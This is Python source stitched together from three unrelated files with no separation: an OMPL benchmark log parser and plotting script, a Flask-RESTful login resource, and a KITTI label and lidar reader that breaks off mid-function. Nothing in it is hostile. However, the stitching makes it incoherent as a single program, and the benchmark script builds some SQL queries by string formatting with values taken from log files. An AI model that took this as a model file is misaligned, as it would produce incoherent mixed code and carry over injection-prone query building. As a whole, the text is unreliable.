#!/usr/bin/env python
######################################################################
# Software License Agreement (BSD License)
#
# Copyright (c) 2010, Rice University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Rice University nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
######################################################################
# Author: <NAME>, <NAME>, <NAME>
from os.path import exists
import os
import sqlite3
import sys
from optparse import OptionParser
plottingEnabled = True
try:
import matplotlib
matplotlib.use('pdf')
from matplotlib import __version__ as matplotlibversion
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
import numpy as np
from math import floor
except ImportError:
print('Matplotlib or Numpy was not found; disabling plotting capabilities...')
plottingEnabled = False
# Given a text line, split it into tokens (by space) and return the token
# at the desired index. Additionally, test that some expected tokens exist.
# Return None if they do not.
def readLogValue(filevar, desired_token_index, expected_tokens):
start_pos = filevar.tell()
tokens = filevar.readline().split()
for token_index in expected_tokens:
if not tokens[token_index] == expected_tokens[token_index]:
# undo the read, if we failed to parse.
filevar.seek(start_pos)
return None
return tokens[desired_token_index]
def readOptionalLogValue(filevar, desired_token_index, expected_tokens={}):
return readLogValue(filevar, desired_token_index, expected_tokens)
def readRequiredLogValue(name, filevar, desired_token_index, expected_tokens={}):
result = readLogValue(filevar, desired_token_index, expected_tokens)
if result is None:
raise Exception("Unable to read " + name)
return result
def ensurePrefix(line, prefix):
if not line.startswith(prefix):
raise Exception("Expected prefix " + prefix + " was not found")
return line
def readOptionalMultilineValue(filevar):
start_pos = filevar.tell()
line = filevar.readline()
if not line.startswith("<<<|"):
filevar.seek(start_pos)
return None
value = ''
line = filevar.readline()
while not line.startswith('|>>>'):
value = value + line
line = filevar.readline()
        if not line:  # readline() returns '' at EOF, never None
            raise Exception("Expected token |>>> missing")
return value
def readRequiredMultilineValue(filevar):
ensurePrefix(filevar.readline(), "<<<|")
value = ''
line = filevar.readline()
while not line.startswith('|>>>'):
value = value + line
line = filevar.readline()
        if not line:  # readline() returns '' at EOF, never None
            raise Exception("Expected token |>>> missing")
return value
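# Illustrative sketch (added for clarity; the sample content is made up): the
# two readers above expect a block delimited by "<<<|" and "|>>>" lines, such
# as the CPU info dump in a benchmark log.
def _demo_multiline_value():
    import io
    sample = io.StringIO("<<<|\nmodel name : ExampleCPU\ncores : 8\n|>>>\n")
    # returns "model name : ExampleCPU\ncores : 8\n"
    return readRequiredMultilineValue(sample)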
def readBenchmarkLog(dbname, filenames, moveitformat):
"""Parse benchmark log files and store the parsed data in a sqlite3 database."""
conn = sqlite3.connect(dbname)
if sys.version_info[0] < 3:
conn.text_factory = lambda x: unicode(x, 'utf-8', 'ignore')
c = conn.cursor()
c.execute('PRAGMA FOREIGN_KEYS = ON')
# create all tables if they don't already exist
c.executescript("""CREATE TABLE IF NOT EXISTS experiments
(id INTEGER PRIMARY KEY AUTOINCREMENT, name VARCHAR(512),
totaltime REAL, timelimit REAL, memorylimit REAL, runcount INTEGER,
version VARCHAR(128), hostname VARCHAR(1024), cpuinfo TEXT,
date DATETIME, seed INTEGER, setup TEXT);
CREATE TABLE IF NOT EXISTS plannerConfigs
(id INTEGER PRIMARY KEY AUTOINCREMENT,
name VARCHAR(512) NOT NULL, settings TEXT);
CREATE TABLE IF NOT EXISTS enums
(name VARCHAR(512), value INTEGER, description TEXT,
PRIMARY KEY (name, value));
CREATE TABLE IF NOT EXISTS runs
(id INTEGER PRIMARY KEY AUTOINCREMENT, experimentid INTEGER, plannerid INTEGER,
FOREIGN KEY (experimentid) REFERENCES experiments(id) ON DELETE CASCADE,
FOREIGN KEY (plannerid) REFERENCES plannerConfigs(id) ON DELETE CASCADE);
CREATE TABLE IF NOT EXISTS progress
(runid INTEGER, time REAL, PRIMARY KEY (runid, time),
FOREIGN KEY (runid) REFERENCES runs(id) ON DELETE CASCADE)""")
for filename in filenames:
print('Processing ' + filename)
logfile = open(filename, 'r')
start_pos = logfile.tell()
libname = readOptionalLogValue(logfile, 0, {1 : "version"})
if libname is None:
libname = "OMPL"
logfile.seek(start_pos)
version = readOptionalLogValue(logfile, -1, {1 : "version"})
if version is None:
# set the version number to make Planner Arena happy
version = "0.0.0"
version = ' '.join([libname, version])
expname = readRequiredLogValue("experiment name", logfile, -1, {0 : "Experiment"})
# optional experiment properties
nrexpprops = int(readOptionalLogValue(logfile, 0, \
{-2: "experiment", -1: "properties"}) or 0)
expprops = {}
for _ in range(nrexpprops):
entry = logfile.readline().strip().split('=')
nameAndType = entry[0].split(' ')
expprops[nameAndType[0]] = (entry[1], nameAndType[1])
# adding columns to experiments table
c.execute('PRAGMA table_info(experiments)')
columnNames = [col[1] for col in c.fetchall()]
for name in sorted(expprops.keys()):
# only add column if it doesn't exist
if name not in columnNames:
c.execute('ALTER TABLE experiments ADD %s %s' % (name, expprops[name][1]))
hostname = readRequiredLogValue("hostname", logfile, -1, {0 : "Running"})
date = ' '.join(ensurePrefix(logfile.readline(), "Starting").split()[2:])
if moveitformat:
expsetup = readRequiredLogValue("goal name", logfile, -1, {0: "Goal", 1: "name"})
cpuinfo = None
rseed = 0
timelimit = float(readRequiredLogValue("time limit", logfile, 0, \
{-3 : "seconds", -2 : "per", -1 : "run"}))
memorylimit = 0
else:
expsetup = readRequiredMultilineValue(logfile)
cpuinfo = readOptionalMultilineValue(logfile)
rseed = int(readRequiredLogValue("random seed", logfile, 0, \
{-2 : "random", -1 : "seed"}))
timelimit = float(readRequiredLogValue("time limit", logfile, 0, \
{-3 : "seconds", -2 : "per", -1 : "run"}))
memorylimit = float(readRequiredLogValue("memory limit", logfile, 0, \
{-3 : "MB", -2 : "per", -1 : "run"}))
nrrunsOrNone = readOptionalLogValue(logfile, 0, \
{-3 : "runs", -2 : "per", -1 : "planner"})
nrruns = -1
        if nrrunsOrNone is not None:
nrruns = int(nrrunsOrNone)
totaltime = float(readRequiredLogValue("total time", logfile, 0, \
{-3 : "collect", -2 : "the", -1 : "data"}))
numEnums = 0
numEnumsOrNone = readOptionalLogValue(logfile, 0, {-2 : "enum"})
        if numEnumsOrNone is not None:
numEnums = int(numEnumsOrNone)
for _ in range(numEnums):
enum = logfile.readline()[:-1].split('|')
c.execute('SELECT * FROM enums WHERE name IS "%s"' % enum[0])
if c.fetchone() is None:
for j in range(len(enum) - 1):
c.execute('INSERT INTO enums VALUES (?,?,?)', \
(enum[0], j, enum[j + 1]))
# Creating entry in experiments table
experimentEntries = [None, expname, totaltime, timelimit, memorylimit, nrruns, version,
hostname, cpuinfo, date, rseed, expsetup]
for name in sorted(expprops.keys()): # sort to ensure correct order
experimentEntries.append(expprops[name][0])
c.execute('INSERT INTO experiments VALUES (' + ','.join(
'?' for i in experimentEntries) + ')', experimentEntries)
experimentId = c.lastrowid
numPlanners = int(readRequiredLogValue("planner count", logfile, 0, {-1 : "planners"}))
for _ in range(numPlanners):
plannerName = logfile.readline()[:-1]
print('Parsing data for ' + plannerName)
# read common data for planner
numCommon = int(logfile.readline().split()[0])
settings = ''
for j in range(numCommon):
settings = settings + logfile.readline() + ';'
# find planner id
c.execute('SELECT id FROM plannerConfigs WHERE (name=? AND settings=?)', \
(plannerName, settings,))
p = c.fetchone()
if p is None:
c.execute('INSERT INTO plannerConfigs VALUES (?,?,?)', \
(None, plannerName, settings,))
plannerId = c.lastrowid
else:
plannerId = p[0]
# get current column names
c.execute('PRAGMA table_info(runs)')
columnNames = [col[1] for col in c.fetchall()]
# read properties and add columns as necessary
numProperties = int(logfile.readline().split()[0])
propertyNames = ['experimentid', 'plannerid']
for j in range(numProperties):
field = logfile.readline().split()
propertyType = field[-1]
propertyName = '_'.join(field[:-1])
if propertyName not in columnNames:
c.execute('ALTER TABLE runs ADD %s %s' % (propertyName, propertyType))
propertyNames.append(propertyName)
# read measurements
insertFmtStr = 'INSERT INTO runs (' + ','.join(propertyNames) + \
') VALUES (' + ','.join('?'*len(propertyNames)) + ')'
numRuns = int(logfile.readline().split()[0])
runIds = []
for j in range(numRuns):
values = tuple([experimentId, plannerId] + \
[None if not x or x == 'nan' or x == 'inf' else x \
for x in logfile.readline().split('; ')[:-1]])
c.execute(insertFmtStr, values)
# extract primary key of each run row so we can reference them
# in the planner progress data table if needed
runIds.append(c.lastrowid)
nextLine = logfile.readline().strip()
# read planner progress data if it's supplied
if nextLine != '.':
# get current column names
c.execute('PRAGMA table_info(progress)')
columnNames = [col[1] for col in c.fetchall()]
                # read progress properties and add columns as necessary
numProgressProperties = int(nextLine.split()[0])
progressPropertyNames = ['runid']
for i in range(numProgressProperties):
field = logfile.readline().split()
progressPropertyType = field[-1]
progressPropertyName = "_".join(field[:-1])
if progressPropertyName not in columnNames:
c.execute('ALTER TABLE progress ADD %s %s' % \
(progressPropertyName, progressPropertyType))
progressPropertyNames.append(progressPropertyName)
# read progress measurements
insertFmtStr = 'INSERT INTO progress (' + \
','.join(progressPropertyNames) + ') VALUES (' + \
','.join('?'*len(progressPropertyNames)) + ')'
numRuns = int(logfile.readline().split()[0])
for j in range(numRuns):
dataSeries = logfile.readline().split(';')[:-1]
for dataSample in dataSeries:
values = tuple([runIds[j]] + \
[None if not x or x == 'nan' or x == 'inf' else x \
for x in dataSample.split(',')[:-1]])
try:
c.execute(insertFmtStr, values)
except sqlite3.IntegrityError:
print('Ignoring duplicate progress data. Consider increasing '
'ompl::tools::Benchmark::Request::timeBetweenUpdates.')
logfile.readline()
logfile.close()
conn.commit()
c.close()
def plotAttribute(cur, planners, attribute, typename):
"""Create a plot for a particular attribute. It will include data for
all planners that have data for this attribute."""
labels = []
measurements = []
nanCounts = []
if typename == 'ENUM':
cur.execute('SELECT description FROM enums where name IS "%s"' % attribute)
descriptions = [t[0] for t in cur.fetchall()]
numValues = len(descriptions)
for planner in planners:
cur.execute('SELECT %s FROM runs WHERE plannerid = %s AND %s IS NOT NULL' \
% (attribute, planner[0], attribute))
measurement = [t[0] for t in cur.fetchall() if t[0] != None]
if measurement:
cur.execute('SELECT count(*) FROM runs WHERE plannerid = %s AND %s IS NULL' \
% (planner[0], attribute))
nanCounts.append(cur.fetchone()[0])
labels.append(planner[1])
if typename == 'ENUM':
scale = 100. / len(measurement)
measurements.append([measurement.count(i)*scale for i in range(numValues)])
else:
measurements.append(measurement)
if not measurements:
print('Skipping "%s": no available measurements' % attribute)
return
plt.clf()
ax = plt.gca()
if typename == 'ENUM':
width = .5
measurements = np.transpose(np.vstack(measurements))
colsum = np.sum(measurements, axis=1)
rows = np.where(colsum != 0)[0]
heights = np.zeros((1, measurements.shape[1]))
ind = range(measurements.shape[1])
for i in rows:
plt.bar(ind, measurements[i], width, bottom=heights[0], \
color=matplotlib.cm.hot(int(floor(i * 256 / numValues))), \
label=descriptions[i])
heights = heights + measurements[i]
xtickNames = plt.xticks([x+width/2. for x in ind], labels, rotation=30)
ax.set_ylabel(attribute.replace('_', ' ') + ' (%)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
props = matplotlib.font_manager.FontProperties()
props.set_size('small')
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5), prop=props)
elif typename == 'BOOLEAN':
width = .5
measurementsPercentage = [sum(m) * 100. / len(m) for m in measurements]
ind = range(len(measurements))
plt.bar(ind, measurementsPercentage, width)
xtickNames = plt.xticks([x + width / 2. for x in ind], labels, rotation=30)
ax.set_ylabel(attribute.replace('_', ' ') + ' (%)')
else:
if int(matplotlibversion.split('.')[0]) < 1:
plt.boxplot(measurements, notch=0, sym='k+', vert=1, whis=1.5)
else:
plt.boxplot(measurements, notch=0, sym='k+', vert=1, whis=1.5, bootstrap=1000)
ax.set_ylabel(attribute.replace('_', ' '))
xtickNames = plt.setp(ax, xticklabels=labels)
plt.setp(xtickNames, rotation=25)
ax.set_xlabel('Motion planning algorithm')
ax.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5)
if max(nanCounts) > 0:
maxy = max([max(y) for y in measurements])
for i in range(len(labels)):
x = i + width / 2 if typename == 'BOOLEAN' else i + 1
ax.text(x, .95*maxy, str(nanCounts[i]), horizontalalignment='center', size='small')
plt.show()
def plotProgressAttribute(cur, planners, attribute):
"""Plot data for a single planner progress attribute. Will create an
average time-plot with error bars of the attribute over all runs for
each planner."""
import numpy.ma as ma
plt.clf()
ax = plt.gca()
ax.set_xlabel('time (s)')
ax.set_ylabel(attribute.replace('_', ' '))
plannerNames = []
for planner in planners:
cur.execute("""SELECT count(progress.%s) FROM progress INNER JOIN runs
ON progress.runid = runs.id AND runs.plannerid=%s
AND progress.%s IS NOT NULL""" \
% (attribute, planner[0], attribute))
if cur.fetchone()[0] > 0:
plannerNames.append(planner[1])
cur.execute("""SELECT DISTINCT progress.runid FROM progress INNER JOIN runs
WHERE progress.runid=runs.id AND runs.plannerid=?""", (planner[0],))
runids = [t[0] for t in cur.fetchall()]
timeTable = []
dataTable = []
for r in runids:
# Select data for given run
cur.execute('SELECT time, %s FROM progress WHERE runid = %s ORDER BY time' % \
(attribute, r))
(time, data) = zip(*(cur.fetchall()))
timeTable.append(time)
dataTable.append(data)
# It's conceivable that the sampling process may have
# generated more samples for one run than another; in this
# case, truncate all data series to length of shortest
# one.
            fewestSamples = min(len(t) for t in timeTable)
times = np.array(timeTable[0][:fewestSamples])
dataArrays = np.array([data[:fewestSamples] for data in dataTable])
filteredData = ma.masked_array(dataArrays, np.equal(dataArrays, None), dtype=float)
means = np.mean(filteredData, axis=0)
stddevs = np.std(filteredData, axis=0, ddof=1)
# plot average with error bars
plt.errorbar(times, means, yerr=2*stddevs, errorevery=max(1, len(times) // 20))
ax.legend(plannerNames)
if plannerNames:
plt.show()
else:
plt.clf()
def plotStatistics(dbname, fname):
"""Create a PDF file with box plots for all attributes."""
print("Generating plots...")
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('PRAGMA FOREIGN_KEYS = ON')
c.execute('SELECT id, name FROM plannerConfigs')
planners = [(t[0], t[1].replace('geometric_', '').replace('control_', '')) \
for t in c.fetchall()]
c.execute('PRAGMA table_info(runs)')
colInfo = c.fetchall()[3:]
pp = PdfPages(fname)
for col in colInfo:
if col[2] == 'BOOLEAN' or col[2] == 'ENUM' or \
col[2] == 'INTEGER' or col[2] == 'REAL':
plotAttribute(c, planners, col[1], col[2])
pp.savefig(plt.gcf())
c.execute('PRAGMA table_info(progress)')
colInfo = c.fetchall()[2:]
for col in colInfo:
plotProgressAttribute(c, planners, col[1])
pp.savefig(plt.gcf())
plt.clf()
pagey = 0.9
pagex = 0.06
c.execute("""SELECT id, name, timelimit, memorylimit FROM experiments""")
experiments = c.fetchall()
for experiment in experiments:
c.execute("""SELECT count(*) FROM runs WHERE runs.experimentid = %d
GROUP BY runs.plannerid""" % experiment[0])
numRuns = [run[0] for run in c.fetchall()]
        numRuns = str(numRuns[0]) if len(set(numRuns)) == 1 \
            else ','.join(str(r) for r in numRuns)
        plt.figtext(pagex, pagey, 'Experiment "%s"' % experiment[1])
        plt.figtext(pagex, pagey - 0.05, 'Number of averaged runs: %s' % numRuns)
plt.figtext(pagex, pagey-0.10, "Time limit per run: %g seconds" % experiment[2])
plt.figtext(pagex, pagey-0.15, "Memory limit per run: %g MB" % experiment[3])
plt.show()
pp.savefig(plt.gcf())
pp.close()
def saveAsMysql(dbname, mysqldump):
# See http://stackoverflow.com/questions/1067060/perl-to-python
import re
print("Saving as MySQL dump file...")
conn = sqlite3.connect(dbname)
mysqldump = open(mysqldump, 'w')
    # make sure all tables are dropped in an order that keeps foreign keys valid
c = conn.cursor()
c.execute("SELECT name FROM sqlite_master WHERE type='table'")
table_names = [str(t[0]) for t in c.fetchall()]
c.close()
    last = ['experiments', 'plannerConfigs']  # referenced tables must be dropped last
for table in table_names:
if table.startswith("sqlite"):
continue
if not table in last:
mysqldump.write("DROP TABLE IF EXISTS `%s`;\n" % table)
for table in last:
if table in table_names:
mysqldump.write("DROP TABLE IF EXISTS `%s`;\n" % table)
for line in conn.iterdump():
process = False
for nope in ('BEGIN TRANSACTION', 'COMMIT', \
'sqlite_sequence', 'CREATE UNIQUE INDEX', 'CREATE VIEW'):
if nope in line:
break
else:
process = True
if not process:
continue
line = re.sub(r"[\n\r\t ]+", " ", line)
m = re.search('CREATE TABLE ([a-zA-Z0-9_]*)(.*)', line)
if m:
name, sub = m.groups()
sub = sub.replace('"', '`')
line = '''CREATE TABLE IF NOT EXISTS %(name)s%(sub)s'''
line = line % dict(name=name, sub=sub)
# make sure we use an engine that supports foreign keys
line = line.rstrip("\n\t ;") + " ENGINE = InnoDB;\n"
else:
m = re.search('INSERT INTO "([a-zA-Z0-9_]*)"(.*)', line)
if m:
line = 'INSERT INTO %s%s\n' % m.groups()
line = line.replace('"', r'\"')
line = line.replace('"', "'")
line = re.sub(r"([^'])'t'(.)", "\\1THIS_IS_TRUE\\2", line)
line = line.replace('THIS_IS_TRUE', '1')
line = re.sub(r"([^'])'f'(.)", "\\1THIS_IS_FALSE\\2", line)
line = line.replace('THIS_IS_FALSE', '0')
line = line.replace('AUTOINCREMENT', 'AUTO_INCREMENT')
mysqldump.write(line)
mysqldump.close()
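# Hedged illustration of the rewrites above: a sqlite3 dump line such as
#   INSERT INTO "runs" VALUES(1,1,1,'t');
# comes out as MySQL-compatible
#   INSERT INTO runs VALUES(1,1,1,1);
# with the quoted identifier unwrapped and the 't'/'f' boolean literals
# mapped to 1/0.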
def computeViews(dbname, moveitformat):
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('PRAGMA FOREIGN_KEYS = ON')
c.execute('PRAGMA table_info(runs)')
if moveitformat:
s0 = """SELECT plannerid, plannerConfigs.name AS plannerName, experimentid, solved, total_time
FROM plannerConfigs INNER JOIN experiments INNER JOIN runs
ON plannerConfigs.id=runs.plannerid AND experiments.id=runs.experimentid"""
    # kinodynamic paths cannot be simplified (or at least not easily),
# so simplification_time may not exist as a database column
elif 'simplification_time' in [col[1] for col in c.fetchall()]:
s0 = """SELECT plannerid, plannerConfigs.name AS plannerName, experimentid, solved, time + simplification_time AS total_time
FROM plannerConfigs INNER JOIN experiments INNER JOIN runs
ON plannerConfigs.id=runs.plannerid AND experiments.id=runs.experimentid"""
else:
s0 = """SELECT plannerid, plannerConfigs.name AS plannerName, experimentid, solved, time AS total_time
FROM plannerConfigs INNER JOIN experiments INNER JOIN runs
ON plannerConfigs.id=runs.plannerid AND experiments.id=runs.experimentid"""
s1 = """SELECT plannerid, plannerName, experimentid, AVG(solved) AS avg_solved, AVG(total_time) AS avg_total_time
FROM (%s) GROUP BY plannerid, experimentid""" % s0
s2 = """SELECT plannerid, experimentid, MIN(avg_solved) AS avg_solved, avg_total_time
FROM (%s) GROUP BY plannerName, experimentid ORDER BY avg_solved DESC, avg_total_time ASC""" % s1
c.execute('DROP VIEW IF EXISTS bestPlannerConfigsPerExperiment')
c.execute('CREATE VIEW IF NOT EXISTS bestPlannerConfigsPerExperiment AS %s' % s2)
s1 = """SELECT plannerid, plannerName, AVG(solved) AS avg_solved, AVG(total_time) AS avg_total_time
FROM (%s) GROUP BY plannerid""" % s0
s2 = """SELECT plannerid, MIN(avg_solved) AS avg_solved, avg_total_time
FROM (%s) GROUP BY plannerName ORDER BY avg_solved DESC, avg_total_time ASC""" % s1
c.execute('DROP VIEW IF EXISTS bestPlannerConfigs')
c.execute('CREATE VIEW IF NOT EXISTS bestPlannerConfigs AS %s' % s2)
conn.commit()
c.close()
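# Hedged usage sketch: once computeViews() has run, the views can be queried
# like ordinary tables, e.g.
#   SELECT * FROM bestPlannerConfigsPerExperiment WHERE experimentid = 1;
#   SELECT * FROM bestPlannerConfigs;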
if __name__ == "__main__":
usage = """%prog [options] [<benchmark.log> ...]"""
parser = OptionParser(usage)
parser.add_option("-d", "--database", dest="dbname", default="benchmark.db", \
help="Filename of benchmark database [default: %default]")
parser.add_option("-a", "--append", action="store_true", dest="append", default=False, \
help="Append data to database (as opposed to overwriting an existing database)")
parser.add_option("-v", "--view", action="store_true", dest="view", default=False, \
help="Compute the views for best planner configurations")
if plottingEnabled:
parser.add_option("-p", "--plot", dest="plot", default=None, \
help="Create a PDF of plots")
parser.add_option("-m", "--mysql", dest="mysqldb", default=None, \
help="Save SQLite3 database as a MySQL dump file")
parser.add_option("--moveit", action="store_true", dest="moveit", default=False, \
help="Log files are produced by MoveIt!")
(options, args) = parser.parse_args()
if not options.append and exists(options.dbname) and args:
os.remove(options.dbname)
if args:
readBenchmarkLog(options.dbname, args, options.moveit)
# If we update the database, we recompute the views as well
options.view = True
if options.view:
computeViews(options.dbname, options.moveit)
if plottingEnabled and options.plot:
plotStatistics(options.dbname, options.plot)
if options.mysqldb:
saveAsMysql(options.dbname, options.mysqldb)
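# Hedged usage sketch (the script filename is an assumption): parse one or
# more benchmark logs into a database, recompute the views, and render plots
# to a PDF:
#   python benchmark_statistics.py run1.log run2.log -d benchmark.db -p plots.pdf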
# -*- coding: utf-8 -*-
from flask_restful import Resource
from flask_login import login_user, login_required, current_user
from .parsers import login_parser, update_info_parser
from .managers import AuthManager, UserManager
from ..constants import Code
from ..functions import make_response
class LoginResource(Resource):
def post(self):
"""登录"""
req = login_parser.parse_args(strict=True)
username = req['username']
password = req['password']
user = AuthManager.authenticate(username, password)
if not user:
return make_response(code=Code.USERNAME_OR_PASSWORD_ERROR)
login_user(user)
return make_response()
class UserInfoResource(Resource):
@login_required
def get(self):
result = UserManager.get_info(user=current_user)
return make_response(result)
@login_required
def post(self):
req = update_info_parser.parse_args()
nickname = req['nickname']
remark = req['remark']
avatar = req['avatar']
gender = req['gender']
result = UserManager.update_info(nickname, remark, avatar, gender, user=current_user)
return make_response(code=result)
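# Hedged usage sketch (route paths and app wiring are assumptions, not part of
# this module): the resources above would typically be registered on a
# flask_restful Api instance, e.g.
#
#   from flask import Flask
#   from flask_restful import Api
#
#   app = Flask(__name__)
#   api = Api(app)
#   api.add_resource(LoginResource, '/login')
#   api.add_resource(UserInfoResource, '/user/info')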
import os
import numpy as np
from wavedata.tools.core import calib_utils
class ObjectLabel:
"""Object Label Class
1 type Describes the type of object: 'Car', 'Van', 'Truck',
'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram',
'Misc' or 'DontCare'
1 truncated Float from 0 (non-truncated) to 1 (truncated), where
truncated refers to the object leaving image boundaries
1 occluded Integer (0,1,2,3) indicating occlusion state:
0 = fully visible, 1 = partly occluded
2 = largely occluded, 3 = unknown
1 alpha Observation angle of object, ranging [-pi..pi]
4 bbox 2D bounding box of object in the image (0-based index):
contains left, top, right, bottom pixel coordinates
3 dimensions 3D object dimensions: height, width, length (in meters)
3 location 3D object location x,y,z in camera coordinates (in meters)
1 rotation_y Rotation ry around Y-axis in camera coordinates [-pi..pi]
1 score Only for results: Float, indicating confidence in
detection, needed for p/r curves, higher is better.
"""
def __init__(self):
self.type = "" # Type of object
self.truncation = 0.
self.occlusion = 0.
self.alpha = 0.
self.x1 = 0.
self.y1 = 0.
self.x2 = 0.
self.y2 = 0.
self.h = 0.
self.w = 0.
self.l = 0.
self.t = (0., 0., 0.)
self.ry = 0.
self.score = 0.
def __eq__(self, other):
"""Compares the given object to the current ObjectLabel instance.
:param other: object to compare to this instance against
:return: True, if other and current instance is the same
"""
if not isinstance(other, ObjectLabel):
return False
if self.__dict__ != other.__dict__:
return False
else:
return True
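# Hedged illustration (the values below are made up): one line of a KITTI
# label file carries the 15 fields listed in the ObjectLabel docstring, plus a
# trailing score column in results files, e.g.
#
#   Car 0.00 0 -1.58 587.01 173.33 614.12 200.12 1.65 1.67 3.64 -0.65 1.71 46.70 -1.59
#
# read_labels() below splits such lines and fills one ObjectLabel per row.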
def read_labels(label_dir, img_idx, results=False):
"""Reads in label data file from Kitti Dataset.
Returns:
obj_list -- List of instances of class ObjectLabel.
Keyword arguments:
label_dir -- directory of the label files
img_idx -- index of the image
"""
# Define the object list
obj_list = []
# Extract the list
    if os.stat(label_dir + "/%06d.txt" % img_idx).st_size == 0:
        return []  # empty label file, no objects
if results:
p = np.loadtxt(label_dir + "/%06d.txt" % img_idx, delimiter=' ',
dtype=str,
usecols=np.arange(start=0, step=1, stop=16))
else:
p = np.loadtxt(label_dir + "/%06d.txt" % img_idx, delimiter=' ',
dtype=str,
usecols=np.arange(start=0, step=1, stop=15))
# Check if the output is single dimensional or multi dimensional
if len(p.shape) > 1:
label_num = p.shape[0]
else:
label_num = 1
for idx in np.arange(label_num):
obj = ObjectLabel()
if label_num > 1:
# Fill in the object list
obj.type = p[idx, 0]
obj.truncation = float(p[idx, 1])
obj.occlusion = float(p[idx, 2])
obj.alpha = float(p[idx, 3])
obj.x1 = float(p[idx, 4])
obj.y1 = float(p[idx, 5])
obj.x2 = float(p[idx, 6])
obj.y2 = float(p[idx, 7])
obj.h = float(p[idx, 8])
obj.w = float(p[idx, 9])
obj.l = float(p[idx, 10])
obj.t = (float(p[idx, 11]), float(p[idx, 12]), float(p[idx, 13]))
obj.ry = float(p[idx, 14])
if results:
obj.score = float(p[idx, 15])
else:
obj.score = 0.0
else:
# Fill in the object list
obj.type = p[0]
obj.truncation = float(p[1])
obj.occlusion = float(p[2])
obj.alpha = float(p[3])
obj.x1 = float(p[4])
obj.y1 = float(p[5])
obj.x2 = float(p[6])
obj.y2 = float(p[7])
obj.h = float(p[8])
obj.w = float(p[9])
obj.l = float(p[10])
obj.t = (float(p[11]), float(p[12]), float(p[13]))
obj.ry = float(p[14])
if results:
obj.score = float(p[15])
else:
obj.score = 0.0
obj_list.append(obj)
return obj_list
def build_bbs_from_objects(obj_list, class_needed):
""" Converts between a list of objects and a numpy array containing the
bounding boxes.
:param obj_list: an object list as per object class
:param class_needed: 'Car', 'Pedestrian' ... If no class filtering is
needed use 'All'
:return boxes_2d : a numpy array formed as a list of boxes in the form
[boxes_frame_1, ... boxes_frame_n], where boxes_frame_n is a numpy
array containing all bounding boxes in the frame n with the format:
[[x1, y1, x2, y2], [x1, y1, x2, y2]].
:return boxes_3d : a numpy array formed as a list of boxes in the form
[boxes_frame_1, ... boxes_frame_n], where boxes_frame_n is a numpy
array containing all bounding boxes in the frame n with the format:
[[ry, l, h, w, tx, ty, tz],...[ry, l, h, w, tx, ty, tz]]
:return scores : a numpy array of the form
[[scores_frame_1],
...,
[scores_frame_n]]
"""
if class_needed == 'All':
obj_detections = obj_list
else:
if isinstance(class_needed, str):
obj_detections = [detections for detections in obj_list if
detections.type == class_needed]
elif isinstance(class_needed, list):
obj_detections = [detections for detections in obj_list if
detections.type in class_needed]
else:
raise TypeError("Invalid type for class_needed, {} should be "
"str or list".format(type(class_needed)))
# Build A Numpy Array Of 2D Bounding Boxes
x1 = [obj.x1 for obj in obj_detections]
y1 = [obj.y1 for obj in obj_detections]
x2 = [obj.x2 for obj in obj_detections]
y2 = [obj.y2 for obj in obj_detections]
ry = [obj.ry for obj in obj_detections]
l = [obj.l for obj in obj_detections]
h = [obj.h for obj in obj_detections]
w = [obj.w for obj in obj_detections]
tx = [obj.t[0] for obj in obj_detections]
ty = [obj.t[1] for obj in obj_detections]
tz = [obj.t[2] for obj in obj_detections]
scores = [obj.score for obj in obj_detections]
num_objs = len(obj_detections)
boxes_2d = np.zeros((num_objs, 4))
boxes_3d = np.zeros((num_objs, 7)) # [ry, l, h, w, tx, ty, tz]
for it in range(num_objs):
boxes_2d[it] = np.array([x1[it],
y1[it],
x2[it],
y2[it]])
boxes_3d[it] = np.array([ry[it],
l[it],
h[it],
w[it],
tx[it],
ty[it],
tz[it]])
return boxes_2d, boxes_3d, scores
def get_lidar_point_cloud(img_idx, calib_dir, velo_dir,
im_size=None, min_intensity=None):
""" Calculates the lidar point cloud, and optionally returns only the
points that are projected to the image.
:param img_idx: image index
:param calib_dir: directory with calibration files
:param velo_dir: directory with velodyne files
:param im_size: (optional) 2 x 1 list containing the size of the image
to filter the point cloud [w, h]
:param min_intensity: (optional) minimum intensity required to keep a point
    :return: (3, N) point_cloud in the form [[x,...][y,...][z,...]], keeping
        only points in front of the camera and, when im_size is given, only
        points that project into the image
"""
# Read calibration info
frame_calib = calib_utils.read_calibration(calib_dir, img_idx)
x, y, z, i = calib_utils.read_lidar(velo_dir=velo_dir, img_idx=img_idx)
# Calculate the point cloud
pts = np.vstack((x, y, z)).T
    pts = calib_utils.lidar_to_cam_frame(pts, frame_calib)  # lidar frame -> camera frame
# The given image is assumed to be a 2D image
if not im_size:
point_cloud = pts.T
return point_cloud
else:
        # Only keep points in front of the camera (positive z)
